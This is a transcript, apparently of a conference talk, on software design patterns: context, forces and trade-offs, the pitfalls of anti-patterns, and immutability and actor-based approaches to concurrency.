people like to have universal principles. Tell me how to use inheritance. What is the right way to use threads? In other words, there is this idea of there is one right answer to these questions and it will always be true. People like that because it appeals to the way that they think. The problem is that's not how it works. So when you say, here's a solution but it only works in this context. Some people hear it's not a very good solution because it only works in one context. What you should be hearing is it is a good solution because it's not general purpose. It works in this context. It is specific and we know what it does and does not do. That's a really important idea. So with every pattern, with every design idea, when somebody presents it to you, you need to be thinking what problems does this solve and when might I not use it. Not just when might I use it. If you cannot find the boundary of it, if you cannot figure out when it's not appropriate advice, then it's not good advice. All advice has a boundary. If you don't know the boundary, then you're not familiar enough with it. So sometimes I joke that if somebody tells you, here's a pattern and it's all fantastic. What are the consequences? What are the liabilities? When might it not work? It always works. They're trying to sell you something. Or they don't know what they're doing. I'll give you a very simple example of context dependency. So my 12-year-old, he walks to school. We trust him to cross roads. He's kind of got his teenage head in the air. It's no longer about ability to look at cars. But the 8-year-old still kind of, he comes to a road and what's the advice I offer him? Janik, you always look right first. See the context dependency? It's not bad advice. It's very good advice if you happen to be living in Bristol, in the UK. It works really well there. It works very badly in Norway. And it'll never, ever work in India. It's nothing to do with some people think, oh, it's the side of the road. No. India has a complex adaptive system. Sometimes people at this conference, when they're talking agile development, they sometimes talk about complex adaptive systems. You do not understand the cast until you have seen Indian traffic. That's the real cast. There, you just look everywhere all the time. That's the pattern you follow. It's context dependent. You do that in Oslo, you get dizzy. So we're solving problems. What we're trying to do here and the reason the pattern thing is important is communicate experience. Because otherwise experience remains locked up and unanalyzed in our own head. You can become really good at something, but it doesn't communicate. But you might not become really good because it turns out that we're not very good at communicating our own experience of stuff. The late DJ, John Peel, I don't make stupid mistakes. Only very, very clever ones. This defines all software developers. You are the elite of the population. Intellectually, you are above pretty much everything else in the population. As a discipline, you are very intelligent, but damn, you make some really clever mistakes. I mean, I just go through it. I look at some of the mistakes, I'm just like, that took a special kind of clever to make that mistake that stupid. You have far greater reach. Stupid people only make simple stupid mistakes. We have such great capacity. And we think, oh, yeah, that's okay. We can adapt to that. Do we? No. There's the XKCD cartoon that points this one out. Until... Until Windows 8, Microsoft hadn't sorted this one out as an issue. And when they kept coming out with better and better, they actually sidestepped the whole problem and said, no, what we're going to do is we're going to give you a visualization. But this is the important point. When is that? That's what? 2012. They had the same problem for over two decades. We don't always respond well to our mistakes. We don't necessarily see the deeper lesson or we need a better algorithm. Actually, they just needed a completely different way to present it. And so we set up some of these myths. We set up myths like this. I didn't have to go very far on the web when I looked this up. I looked it up a couple of years ago. I didn't have to go very far. This myth is very, very deeply ingrained. Failure is a far better teacher than success. Is it? Oh, hell, it is. Christopher Walken, great actor. If you want to learn how to build a house, build a house. Don't ask anybody. Just build a house. Great actor. Terrible teacher. Terrible teacher. This is such bad advice. A house is a complex thing. It turns out, bizarrely enough, we've been building houses for a very long time and there is a wealth of knowledge about how to do it right. It turns out that if you look at the solution space, the solution space, the possible arrangements of a thing that could be called a house are huge. The number of them that actually work is tiny. You could wander the wilderness of the solution space for decades before you built a house that didn't burn down, that didn't let in water, that, you know, all of this kind of stuff. And the worst thing about people that are self-taught is that they will eventually end up, you know, you go there and you say, okay, that's kind of, your doors are very interesting. Yeah. None of the angles are at right angles. No, it's my style. They personalize it. They contain it. It's, oh, yeah, that's how I do it. It's as if that's somehow kind of okay now. It's special because it's mine. It turns out software development is actually harder than building a house. The stuff we're doing is not physical. It's profoundly abstract. It's intellectual stuff and then we create lots of it. To make it work is enough of a skill. To make it work effectively and well and to communicate our intention at the same times. All of this is non-trivial. We have so many paradigms, so many possibilities. Everything is always changing. You know what? Maybe you want to actually do the opposite of this advice. Maybe you want to take advantage of other people's knowledge so that you don't have to make all of their mistakes. Trust me, you'll make enough mistakes. Those will happen. But the idea of repeating every single mistake, you could go for years without ever discovering simple basic data structures or ideas like that. So when we talk about things like craftsmanship and patterns, in fact, I was interviewed a couple of years ago. Somebody said, okay, sometimes I get associated with software craftsmanship. Somebody said, so do you see this as being different to patterns or how do you see it being different to patterns? One of the things that I point out is there's a lot that's different, but one of the things that's really very much the same is the idea of communicating to other people. Look, this is a solved problem. Let me communicate why it's a solved problem, how we solved it, and when it does and does not work so that you can solve more interesting problems built on it rather than feel free, get this one wrong, and then I'll surprise you with the correct answer. This isn't school. We're building real stuff here. So this is not good advice. People don't generally learn when they do it themselves. This is one of my favorite examples, Eke Homo. This is in, it was painted in the 1930s in a church in Spain, and it fell into, well, need of restoration a few years ago. And then a self-taught local artist, Cecilia Jimenez, who was about 80 at the time, decided to restore it when nobody was looking. Yeah, because she's self-taught, because she didn't. It turns out people have been doing art for a few centuries as well, and there is a large body of how to effectively render this, also a large body of knowledge about how to restore paintings. There is a certain irony to this, is that the church has now actually made a lot of money out of this, because people go to the church just to see this, and they pay. Cecilia Jimenez's family are trying to sue to get some of the money. Anyway, the point here is this is difficult stuff. Ultimately, you need as much knowledge as you can get. And this idea that we simply learn from our mistakes. Now, we can learn from our mistakes. That's not the same as we do learn from our mistakes. History suggests that human beings do not learn from their mistakes very well at all. But there's one thing that we do that is quite good and is our way out of this. Mark Pagel at the University of Reading doubts that homonyms before homo sapiens had what it takes to innovate and exchange ideas, even if they wanted to. He draws a comparison with chimps, which can make crude stone tools but lack technological progress. They mostly learn by trial and error. This is important. You cannot just learn by trial and error, because the error space is far, far larger than the success space. Whereas we learn by watching each other, and we know when something is worth copying. That's the trick. That's the real trick. It's like, oh, you're doing that. That seems to work. I'm going to try doing that. Obviously, as an evolutionary adaptation, this has a few areas where it backfires. It explains all of fashion, for example. Sometimes we copy rubbish. And it takes a while for people to learn. You know, that's really bad. And then 30 years later, it comes back again. But the point is that's a side effect. But copying is the, I'm going to try that, because that seems to work for you. It's one of our, it's a social strategy for searching the rather large error space to find that, oh, we're all doing things that don't work, and that person's done something that works. I wonder what they did that's different. Let's copy that. Very, very simple idea. And yet very, very deeply rooted within us. Again, repetition. It's about the patterns. Is there value in just simply looking at things that don't work? Well, up to a point. But Jim Capplin made this observation a long time, nearly 20 years ago, long time before anti-patterns became a popular idea. He was already suspicious of the premise. I mean, I just don't like the term. I don't think anti-pattern makes sense, because as a piece of vocabulary, anti-patterns are patterns. They're just dysfunctional ones. There's no kind of anti-pattern meets pattern, and then kind of destroys with a puff of gamma radiation or something like that. They wipe each other out. No. Anti-patterns don't provide a resolution of forces, as patterns do. And they are dangerous as teaching tools. Good pedagogy builds on positive examples that students can remember rather than negative examples. They might be a good diagnostic tool to understand system problems. And that's interesting because the idea was then reinvented as smells. We typically, these days, people are more like to write code smells and architecture smells and so on than they are about anti-patterns. But the terms are effectively equivalent. But this idea that we see certain bad examples, but that's not a really good starting point. I can show you lots of ways of not programming. From that, can you deduce good ways of programming? Well, probably not. And this is like any other human activity. We copy what we see as right. So what we're saying with patterns is actually something far, far more sophisticated. Whilst it is possible sometimes to extract knowledge from certain forms of failure and certain errors, we do a lot better when we actually communicate and share things that work and then reason about why they work. And we see this as a term that's pretty much equivalent. And this idea came around at a similar time to patterns being adopted in software. This book by Mary Shaw and David Garland is widely regarded as one of the key works in the discipline of software architecture, which was a very ad hoc discipline. I'm not necessarily going to say that everything that's come out of the concept of software architecture has been good. But as a formalized approach, there's this book about 20 years old and it had quite a lot to offer. But it's very much historical value. I went back to it a couple of years ago and it's not as interesting now. There are better books. But they made the observation. They said, look, one of the hallmarks of what architectural design is the use of idiomatic patterns of system organization. Many of these patterns are architectural styles. They draw a, they say basically these are, these concepts, these terms are effectively equivalent. Have been developed over the years. System designers recognize the value of specific organizational principles and structures for certain classes of software. So we're back to that idea, although they're coming in from a different angle. They're basically saying certain kinds of problems in certain kinds of context. We've seen things that work. We've seen other things that don't work as well. We like these things that work. Why do they work and how can we talk about them? What vocabulary can we offer people? How do we communicate what works and how to create solutions that are viable? And this fitted with the introduction into software. The first introduction of patterns into the software development space was in 1987. Ward Cunningham and Kent Beck, respectively, I guess best known these days as being the inventor of the wiki and kind of the, and the father of XP in Test Room Development, Modern Test Room Development. They came across this book and others by Christopher Alexander, which detailed the idea of patterns for building architecture, the built environment. How to lay out your home, how to organize a city. So quite a range of detail there. So where do I put my keys when I walk in the front door versus, and how should we define the relationship between the city and the surrounding country site? So quite broad scope in his work. He wrote this trilogy in reverse, obviously, because that's how you do trilogies. Part three was published in 1975. Part two was published in 1977. Part one, this one was published in 1979. And he makes a very simple observation. We know that every pattern is an instruction of the general form context, giving rise to conflicting forces, the nature of the problem in other words, and giving rise to a configuration about which we can then discuss the trade-offs. But there is this idea that the context is the anchor. And the context, what does that mean in programming? Well, it can mean pretty much, pretty much anything. Context can mean programming language. You may be familiar with techniques that work in one programming language that make no sense or solve no problem or cannot even be expressed in another language. These are patterns that you have learned for effective communication. Sometimes people try to distinguish these as idioms, but that turns out that doesn't make as much sense as they thought it did. They're just patterns. These are patterns with the language as part of its context. There's a bunch of techniques that for dealing with memory management, for example, in something like C++ that make absolutely no sense, something like Java, because they cannot make sense because you cannot even express the basis of the problem or the solution. On the other hand, there are different looping and collection and iteration styles that we find in common across a number of languages, C sharp, Java, C++. There are elements that are very similar that are fundamentally different to other styles of iteration that we find in other languages such as Ruby, small talk, and in functional languages. There is a very, very different styles. So language, language family become part of the context. But also the other technology and other architectural choices, the patterns you have already chosen. If you're in a single threaded event-driven system, then your design decisions in the context you're working in is going to look very, very different to if you are in a multi-threaded system, plain and simple. If you're writing top-down code that is processing something algorithmically, it's going to look very different and the trade-offs and the techniques you're going to care about are going to look very, very different to something that is in an interactive environment sitting within a framework. So therefore, the context shifts. Each one of these decisions is made. You change the context. So the context defines characteristics of what causes a problem, what you can do about it. But that's not the most interesting bit. This is really simple and yet we fail so often when we talk about techniques. We say a pattern is good whenever we can show it meets the following two empirical conditions. Notice a couple of things. One, he says there is such a thing as a good pattern and he later defines the idea of a bad pattern. So it turns out that what many people call anti-patterns, actually we're just using kids vocabulary. We just call them good and bad. It turns out that the patterns that people repeat and are any good are bad. There's nothing anti about them. They're just not very good. There's no sexy Latin term for them. The other thing is that this is an empirical approach. Let's look at the first thing. The problem is real. In other words, when somebody proposes a technique, even without thinking about patterns, if somebody proposes a coding guideline, if somebody proposes a particular architectural decision, if somebody offers you a technique or a general approach to something, the first thing you need to do is check, is the problem real? Are they imagining a problem or is it real? Far too often we fill things like coding guidelines and architecture documents and just people's heads with ideas of things, well, that could be a problem. Yeah, you're right. We need to solve it. It could be a problem, but many of the things that people imagine are simply not problems. So first of all, do you have the problem we actually propose to solve? This means we can express the problem as a conflict among forces, which really do occur. This is an empirical question. Conflict, what we mean by conflict among forces, in building architecture, forces are easy to define by large. Gravity defines a force. Yeah? Whatever happens with your building, it better deal with gravity. Gravity is not an option. You don't plug it in later. That's a given. And it is typically the conflict. Sometimes you're not aware of the conflict, and this is the idea of using this approach, using this kind of three-part rule. Whenever you see a solution, if you remember earlier on, I said we care about intention. Whenever you see a solution, what you're looking at is a configuration. Here in the source code, I see a solution. Work backwards. What might this be solving? And then you can determine whether it still solves a real problem or whether the problem was imagined or whether it continues to solve a real problem. It's up to you. Work backwards. What are the conflicting forces? Sometimes we don't normally think about this. So let's try and reason about it and understand what is and is not a pattern. So let me give you something that's not a pattern. Okay? Very simple example. Nothing to do with code. And there's a very simple, obvious answer. I want the simple, obvious answer. I'm giving you a clue here. You walk into a room. It's dark. You need something from the other side of the room, but you cannot see where you are going. What is the obvious solution? Turn on the light. Yeah. Brilliant. Okay. It's not a pattern, though, even though it's been repeated. Even though, as I speak, there are people around the planet turning on lights as they go into darkened rooms. It's not a pattern because there's no conflict in the forces. There's nothing that prevents you from doing that. Let's try that one again. You walk into a room. It's dark. There is a baby asleep in the room. You need to get something from the other side, but you cannot see where you are going. Ah. Now we've moved ourselves into a design space because, well, you can turn on the light, but as my wife used to say when our kids were smaller, you wake him, you take him. So, you know, he's your baby, not mine at that point. So the point there is we now have to get thinking. We need to resolve this. Yes, I could turn on the light, but there's a major downside to that. So now you have tension, and it's that tension that we try to resolve with an appropriate solution. Sometimes people are very creative with the solution. There's all kinds of various strategies. People pull out. People say, oh, okay, you can use a torch, flashlight. How many people actually have a flashlight on them? Not a phone because it turns out this is another point that is actually useful for illustrating. Sometimes where people struggle with patterns. I often get people, when I run this as a workshop, people often put, you know, torch slash phone as if they're the same solution, but they're not. They use the same guiding principle. But let's actually work through the forces and the solution. What's one of the simple properties that torches have that phones don't? Let's do it the other way around. It's easier. Give me a property of a phone that a torch does not share. It's a phone. Exactly. It's a phone. It makes noise. When you walk into the room, make sure your phone bit of your phone is not being a phone bit. In other words, the one thing it should not behave like is a phone because otherwise you get the baby. Okay. You never sit there and go, oh, I must turn my, I don't, I need to turn my torch to silent. Well, let it just, but no, that's not an issue. So in other words, the details of the configuration, the details of the problem you have to solve. In other words, to make this a good solution, I have to take different action. If we said anything about the constraints of the torch, for example, I mean, we've got a couple of torches at home, a couple of flashlights. I've got one that's about this big. You can use it as an offensive weapon. If you turn it on, you need to put dark glasses on. Maybe that's not the one we use in the kids' room. So there's an upper limit we need to respect. So there's a range over which this solution makes sense. There's, we have, when we detail the configuration, we have to say, ah, this is what makes it work. Too much light, not good. Whereas with phones, we tend to have the opposite problem. If we use a phone's backlighting or anything like that, it tends to be the opposite. It may not be bright enough, but it's rarely too bright at that level unless you have a specific torch app. There's another issue of availability. These days, everybody knows where their phone is. And your phone is always fully charged. I have no idea where most of the flashlights in our house are. And I, well, I dug one out the other day and discovered the batteries have been dead for years. Phone, no, no problem with that. I know where it is. People have a phone about them, about them. So there's, so notice that what we've done is we've actually said, look, the forces you have to resolve with each one of these solutions, the details of the configuration are actually completely different. Although they use handheld light as a book guiding principle, they're actually different patterns. Now, this explains sometimes the struggle that people have with a lot of software patterns that it's, at one level, seem kind of similar, but actually end up being very, very different patterns in practice. Okay? So the gang of four in their book, they made a mistake with the iterator pattern. They mixed two versions of iteration, one that uses an iterator object and one that uses callbacks. These are so different. I cannot think of any two design solutions that could be more different. They're not the same pattern. In other words, they don't belong in the same chapter. They tried to kind of smooth over it. I know why they did it. Partly historical reasons. But the point is, these are two different patterns. They're not the same pattern. They did the same with adapter. There's a class adapter. Adapter class by inheritance has completely different trade-offs to adapting a class by wrapping it and fully encapsulating it. These are not the same solution, even closely. So it turns out that people get mislead by this kind of, oh, it's a similar principle at one level, but actually it's completely different. No, they're different patterns. It's not one pattern with two variations. It's different patterns. So this is worth keeping in mind. This idea of whenever anybody presents you with a solution is the problem real. But also, and this seems obvious, the configuration solves the problem. Does that, that means it's actually a solution? Which is, I mean, I think that's obvious, but all too often we get drawn into an idea, and there's been a number of techniques that people have proposed over the years. Here's how to use inheritance. Here's how to override an equals method. Here's how to do this. All of these kinds of little bits and pieces. And yet, in many cases, they don't actually solve the problem they set out to do, but they look really good. They look like they want to be solutions, and so we follow them through. And again, this is an empirical question. So this is a very simple idea. This applies to all design, but obviously when we're talking about something that is recurrent, this becomes even more important. But this is a good litmus test you want to apply to anything that you do. Now, when we talk about patterns to a lot of people, they immediately want to see a catalog. I want to find lots of online patterns. I want to find patterns in books. And it's just like everybody comes back with the same, same damn pattern every time. I went to the pattern shop and look what I bought. Okay. I'm not going to talk about Singleton because this is my belief on style. What you're trying to do is make a place habitable. You're trying to solve problems, not create new problems. The number, if you do a Google search for Singleton, for example, half the results are, I've got a Singleton and I've got this problem. Right. Let's analyze that. What's the motivation of the problem? I have a Singleton. How could I fix this problem? Not have a Singleton. Solved. Done. Okay. That consultancy was free. Okay. Let's talk about another problem that's another space that people find themselves in that is a little more, I can't read this. You have to read it. So, because I want to talk about habits and the way that we develop a mindset. We develop a mindset for solving problems. Habits that are formed by our programming language but on our projects. We become familiar with a way of solving something. And we assume that everything fits with that. And we see the world through these. And sometimes we need to revisit and reframe it completely. So let me give you a very simple example. The concept of concurrency. Concurrency is now available fundamentally deeply in the hardware. Concurrency is used for countless reasons. Normally when you ask people, why do you want to make this concurrent? Normally the reason is performance. Sometimes the reason is because everybody else is doing it. That's not a good enough reason. Sometimes the reason is because I haven't got it on my CV. That's not necessarily a bad reason but try and do it privately at home. But sometimes the reason, most often the reason is we want concurrency because we want to improve performance. Now what's interesting is people were still saying this a few years ago when we were mostly single core. It's just like, okay, there's some things we need to discuss there. There are reasons you want to do concurrency. It's to do with simplicity of expression. But the real thing, really interesting thing happens when you say concurrency. You say, right, okay. When I say concurrency, what's the first word that comes into your head? I used to do this in workshops, a couple of workshops. And pretty much without fail, I'd say, I say concurrency, you say the first word that comes into your head and it threads. Okay, right. So I say threads and the first word that comes into your head, people will only say locks or synchronization. And it's at this point that I need to point, I need to state, okay, so what is the lock? What is a lock? What is the synchronization primitive? A synchronization primitive is the antithread. It is against concurrency. It works because it reduces concurrency. So if your goal is to have concurrency and you really want that for performance reasons, if you have a lock-based architecture, what you're doing is you're saying, we want a concurrency but actually we were kidding. Because what we're doing is we're actually slowing it down there. And this is a problem. Where did this problem come from? This problem comes from a path that we have taken historically. That people started with procedural code, sequential code, started moving into objects, still largely sequential, often event driven. And then we added threads. But threads were added very much as a procedural abstraction. Threads are effectively the go-to of concurrency. I don't mean that in a necessarily bad way. The go-to is the most powerful primitive control structure in the sense that you can build every other control structure out of a go-to. It's just that sometimes it does feel like banging rocks together. And sometimes you miss and it hurts. That's why we don't use go-tos. Just remember go-to fail and all these other ones. Security, you know, next time somebody looks like they are going to use any form of fancy break and I saw somebody say, oh, this isn't a go-to and it was a label break. And it's like, no, that's a go-to. Refraise this code. It was a piece of JavaScript I found online the other day. I had nothing better to do with my Saturday morning than look at JavaScript. It must have been a bad Saturday, sure. And it was really interesting just dealing with a label break and you can actually end up with a much more elegant and more optimal piece of code that was less likely to trigger the next great security bug. So they're primitive, but primitive in a way of being constructive, but also primitive that we make mistakes. Threads are like that. They are the most powerful construct. You can build any other concurrency concept out of them, but you can also hit your fingers and it hurts. I think the other thing to notice is that many of our approaches to solving this stuff are based on this problem of we're going to take a piece of code and we're going to add locks. I've had consultancy visits where I've been, right, we've got this code base and we're adding threads and it's just like, I'm going to try and find the exit at this point because adding threads to an existing code base doesn't sound safe because normally it's been built around sequential assumptions and it's been built up like that. So we need to work out where to add locks. So here's a very simple approach. Let's not add locks. Let's look at this. I'll skip the wording. The thing I'm interested in is this is an immutable value. Let's rearrange the problem. So the example I normally use with this one is just simply a date class. I've got a bit of Java here. We get a date class. Obviously it gets bigger because everybody always adds more features and we've gone and done the usual habit of get and set because our IDE gave us the option of get and set and we like the fact that get and set rhyme. We think that's really neat so we make our get and sets and they all line up beautifully and then we implement it one way and we've just about got the constraints worked out when somebody says that's really stupid. You should do it like this and guess what? All the get a code is really easy but we have a lawful lot more set a code. It turns out that to write this correctly you need about twice as much set a code as you need get it and you get very, very clever and you spend a lot of time on this class and then one day out of nowhere somebody comes in, somebody from the outside world and you employ who has seen the light somewhere else and they come in and say, oh no, why don't you try this? What? Get rid of all the setters. Can you do that? Yes, it's allowed. And suddenly you have an object that can never, ever change and while you're at it you decide it's a stupid name and convention anyway. Here you have an object that will never, ever, ever change and if it never, ever, ever changes then the amount of synchronization I need is none because this is the other thing that's locked up in people's minds and I find this one as well and I've actually done this on a couple of consultancy visits. One of them was more memorable than the other because people were looking at me like, oh we got the right guy in, because I was saying things like, well okay, so why do you need synchronization? Well we need synchronization to make the code thread safe, okay? So why is it not safe? Well, because we've got threads, okay? I'm still not with you and they think, oh jeez, he's an idiot. I say, why are you making the code unsafe? You know, what are you guys doing to make it unsafe? Why would you write unsafe code? That's how you turn it around. I say, well you have two threads and they're looking at the same piece of data. Yeah, I don't see any problem with that. I think he really is stupid. Look, one of the threads might change it. Whoa, hang on, you never said anything about that. You never said anything about change. Clearly that's the most important thing that's going on but it's the last thing you said and this is really interesting because what it does, it's not people being stupid. It's what you're doing is you're reflecting a deeper set of assumptions that people start from the position. All data is modifiable. I can change things. I can assign. I can modify. That's an entitlement. When I create objects, I am entitled to modify the state of that object. That's kind of built into a lot of programs without realizing it. They picked it up as a habit. What we're doing is we're actually going in there and questioning it. Now, it's a good idea to do immutability for a number of reasons, particularly reference based languages. Particularly also code if you don't want bugs. It turns out that most bugs arise through accidental state change. You get a lot fewer bugs if you don't have state change. This has always been true. This is nothing new. But what's really interesting about concurrency is it takes these basic issues and it plugs them into a huge, great amplifier of a martial stack, a stage wide, and it makes your little annoyances real, real problems. That's the amplification effect. That's one of the reasons we care about this stuff. It turns out that this little, oh, well, we can change them. Why don't we just get rid of that? There's this old joke, doctor, doctor, every time I do this, it hurts. What does the doctor say? Don't do that. Yeah. Doctor, doctor, every time I have shared mutable state, it hurts. Well, don't do that. Why would you do that to yourself? Yeah? So this is the thing that sometimes we don't reason about our habits. We need to go back. This is why revealing this assumption is important. Now, there's another technique that also shares some of the same structure, copied objects. So if I re-render that data example in C++, a language in which copying, passing around by copy is indigenous and effectively at the core of the language, and we make the same simplifications. We might be tempted to put in a setter method. Forget that. You don't need it. You can get rid of it completely. The only way to change state is through an assignment binding and we're done. But it turns out the thing we're really interested in is those little things that are in the italics, the copying behavior. It turns out that when you copy something, it also has this very profound effect. If I give you a copy of something, you can run off with it in a different thread if you like. You can do what you want with it because it's a copy. There's nothing you can do to that that will ever need synchronizing with my copy because mine's the original. And this is important. Both of these share an underlying solution structure, which we can put quite simply as a sort of synchronization quadrant. This is all you ever really need to know about how to architect systems with concurrency. And it's a quadrant diagram. So you know it's simple. Quadrant diagrams organize the universe into two axes of two things. And there's normally one that's really, really bad. I've made that even easier for you by making it read, or at least some approximation of read. So it turns out that if you have a mutable state, then life is good. Life is easy. There is no synchronization. You're not slowing anything down. You can't get the synchronization wrong, which is nice. On the other hand, if you pass things around and everything is copied by default, the things you are dealing with, that you're trading in copied items, then it turns out that, again, you're not revealing state that can be changed. The individual copies might be changeable, but they are isolated. So it turns out that these are both reasonable solutions. It leads to a complete reframing of how we should think about this, that sometimes where people start off, I have a modifiable object that I am sharing, that's your starting position. That's a bad starting position, because that puts you in the top right-hand quadrant, which is the quadrant of pain and synchronization and debug sessions and all this kind of stuff, and intermittent errors. So it's very, very simple, but the problem is that until you plug this into the amplifier of concurrency, it's not obvious that this is the issue. But many people start from a different position. So most of the problems that people have encountered with concurrency, either at a personal level or with frameworks, because guess what? Most of these frameworks that were given to you, either payware or freeware, most of these were actually written by people who also had the same kind of mindset. They started from the position that state is modifiable, and now we need to fix that, rather than actually we should start from a different set of assumptions. I should look the other way when I cross the road, for example, rather than compensate for it in some other way, rather than fix that. What we're going to do is just start from a different position completely. And this is this issue, shared mutable state is a problem. Bartosz-Lamilowski had this wonderful observation, shared memory is like a canvas where threads collaborate in painting images, except they stand on opposite sides of the canvas and use guns rather than brushes. The only way they can avoid killing each other is they shout, duck, before opening fire. You look at some code base and you see, yeah, this is a war zone. It is just like, well, if we synchronize that, what happens to this over there? Well, we might get deadlock. Oh, my God, what are we going to do? And then people start doing all kinds of crazy things. Well, maybe if we use some kind of atomic thing here and it's just like, boom, you know, mushroom cloud arises above the coat. So it turns out that we've known about this for a very long time. There is, this is the Chinese translation, 97 things, every programmer should know, but translated conveniently back into English for your reading ability. Russell Winder, message passing leads to better scalability in parallel systems, just makes the observation. Instead of using threads and shared memory as our programming model, we can use processes and message passing. A process here means protected independent states with executing code, not necessarily an operating system process. In essence, very much as people originally imagined objects to be rather than the kind of glorified abstract data types that we normally program them to be. Languages such as Erlang, which was invented in the 70s, but, or its elements were invented in the 70s, and has now more recently become popular, and Occam before it, although technically Occam, I think, may have post-dated it, have shown processes are very successful mechanism for programming concurrent and parallel systems. Such systems do now have all the synchronization stresses that shared memory multi-throwed systems have. There's another benefit here, is performance. It's not simply simplicity of programming and reasoning. Simplicity of programming often equates to simplicity of reasoning. If you can fit the ideas of a program in your head and reason about them, then it is simple. If you cannot, then it's difficult. That's it. We are the bottleneck in software development. And this gives us this idea that, in particular, something like Erlang, Occam is based on a thing called communicating sequential processes, CSP. Erlang is based on a different model called the actor model. And Andre Alex Andrescu, who's in his conference, wonderful observation about multi-threading a few years ago. Multi-threading is just one damn thing after before, simultaneous with another. Great quote. Far less interesting quote would be the following one. Actor-based concurrency is just one damn message after another. That's it. It's really boring. We find that actor-based computation is incredibly simple to reason about because wherever you are in the code, you don't have threads as primitives. You simply have an object that can respond to a message in its own time, in its own sequence, and it chooses what it's going to select. And it says, I'm prepared to receive this, and I do something related to that, and I maybe send a message off. I have no idea where it's going to, effectively. No idea where this is coming from. It's typically asynchronous in structure. But what you have is the idea that everywhere, wherever you are within each actor, specialized kind of object, effectively, within each actor, it's sequential. The world is single-threaded. Wherever you are standing, it's single-threaded. The overall composition of all of these objects may be concurrent, but wherever you are, it's single-threaded. It feels single-threaded. Everything's happening in a well-defined order. That's what makes this and other models like it very, very attractive, because they just simplify in a way that we can understand. We can do things one thing at a time. Yeah, that's not a problem. We basically take, I mean this is actually something that, that's an experience of a few years ago. I did a master's degree, and I thought that everybody, I was going to emerge into, I was going to emerge into the industry and everybody would be doing actor-based computation. This is one of the books I based my thesis on. Everybody would be doing actor-based computation, but it turns out everybody was migrating to Windows 3.1 at the time. It was not for another two decades that people said, hey, this actor idea, that's quite cool. It turns out it is quite cool for very simple reasons. It's very unexciting because it allows you to reason about it. So the frame, the mental frame that you get, is just very much wherever you are, it's sequential. I communicate with other people, they respond in their own good times. It's inherently asynchronous, very, very relaxed. You hide all of the mechanics. Beneath it, you'd implement it with threads for example. You can hide all the mechanics, but the idea is your world view, you never have any raw threads, you never have any raw synchronization. It's just a simple world view. And it's that which allows this to be a very scalable model as well. Now, there are a number of other things we can, we can keep on talking about different approaches, but I just wanted to use that as a context and an example of a shift. But this quote I think is interesting. I believe the current state of the art computer program reflects inadequacies in our stock of paradigms. In our knowledge of existing paradigms, in the way we teach programming paradigms and in the way our programming language support or fails to support the paradigms of their user communities. Now the word paradigm is used here. It's from paper called the Paradigms of Programming. It was published in 1979. If you're ever going to use the paradigm word, read this paper first. Make sure that anybody who uses the paradigm word in your company reads this paper first because this, well first of all it'll stop them using it, which will be really good because you're, oh we're undergoing another paradigm shift, that's more business speak, we need less of that. But actually this paper makes a really good case for what we call patterns. When you read the, when you read the paper you suddenly realize he's talking about design styles, recurrent design styles, that's what he's talking about. We now have a term for it, patterns, but he was referring to it in another use of the term paradigm. This is Robert Floyd. He won the Cheering Award in 1979. That's, this is his Cheering Award paper and speech. And he makes this observation and it still feels incredibly true. But this idea, he talks about the user communities. Let's go back to this idea of patterns. What do, who do patterns speak to? Patterns audiences ultimately always human. Although we may use libraries and software generators to help us in support of them, it's ultimately the human being that is responsible for reasoning through, oh we've got this context, we've got this problem. What are the forces? Is that an appropriate solution? What are the consequences of applying this solution? Okay, what are the trade-offs? Always explore the trade-offs. Does it make it easy to develop but very, very, but very, very slow or is it really, really fast but hard to develop? These are trade-offs. I think one of my, my favorite solutions to the proposed solutions to the walking into a room with a baby problem is use night vision goggles. If you get a room full of geeks and you work on this problem, normally one or two groups will propose night vision goggles. If I'm running a really good workshop, I know it's a good workshop when every single group proposes night vision goggles. And it's a serious workshop when people start using actual model numbers. But obviously one of the trade-offs is, yeah, you might not have them available. They might cost a little bit. But the point there is we explore the trade-offs. We use automation to get us somewhere but it is you ultimately that makes the decision, which also tells us something else. The idea of patterns, and that's a book, it's got patterns in it. But the original vision of patterns, Christopher Alexander, the architect, was not simply that we would just reuse ideas that other people had mined and so on. We would look at our own experience and see what worked as well. People often think patterns are written by pattern authors. You write books and stuff like that. But actually, it can be very ordinary people, even ordinary Norwegians. Good grief. This is Cisco, or formerly, Tamburg. We ran a patterns exercise a couple of years ago. A proper workshop actually looking at getting folks to look at some of their own code and say, well, what are the techniques that we use that perhaps are not visible elsewhere that other people might not know about? In fact, the way I framed it was very much the idea that imagine if I were to join your team on Monday. What design approaches, what kind of typical arrangements do you guys use that I might not be familiar with but would help me understand how your code is put together? Little bits and pieces like naming conventions, where files live, how your philosophy of use of the version control system, what granularity of it, all of these things are really helpful, how the build system works. But ultimately, how does it all fit together? What's your philosophy of it? Give me the style, so to speak. And we may not have the words for that. So this is a case of mind the patterns that would basically look into your own design to see what would work. Now, this idea of explanation goes a lot further as well, of explaining a thing that already exists. We can actually tell a story about it as well, because clearly you don't just want to give people, here's a pile of patterns that we use. It's not very helpful. This is one of the better known ones. This is the J unit storyboard. And it's Kent Beck and Eric Gamma documented this many years ago. But what is interesting about it is it effectively summarizes the whole article at the end. It shows you how to write J unit from scratch. It shows you each decision. And then it shows you at the end in order, almost like a sort of a zoomed out view of how it grows, each decision at a time. And it expands. That's really quite cute. We followed a very similar model of that in Poser 4. We did a system that Siemens had developed, a warehouse management system. You know, our story was 100 pages long, involved 50 patterns. And it told a story of how the system was developed. But the thing you have to remember is, did it really happen like that? Well, no. It didn't. We're taking some basic liberty with this. Historian of Science and TV, James Burke, noted history rarely happens in the right order at the right time. The job of a historian is to make it appear as if it did. What we're doing is we're saying, it's as if this had happened. Because you're normally going to end up, you know, there are, you know, I walk in on Monday. So I see this bit where you've got the call back between the broker and this other sort of resource allocator. And how did you come up with that piece of design? You're having a chat with the chief architect. And the architect says, oh, yeah, that, that one came to me in the shower. How useful is that? He's sitting there going, okay, so I need to take a shower in order to understand the design. I need to take a shower with the architect in order to understand the design. The problem is, although that may be a true statement, it's not, it doesn't help you understand. So the point about these stories is as with most stories, it's not a true retelling, but it's as if it could have been. And I will tell you, so either, either something comes to you in a moment of inspiration and what you do is you disentangle it and say, oh, this happened, then this happened, then this happened. You get this problem if you apply this technique and then this, you resolve it with this and then that leads to this and then you're done. You make it as if it's that. The other thing you might do is also, well, we spent a year wondering the wilderness. We kept making mistakes and you tell, you bore the poor person with all of the mistakes you ever made. But then you could compress the whole story into, yeah, imagine you did this and then solve that problem and then, and then, and then you're done. So it's, these are not necessarily based, they are based on reality, but they don't have to be real stories. But you're able to tell a story through the design decisions that we see and patterns 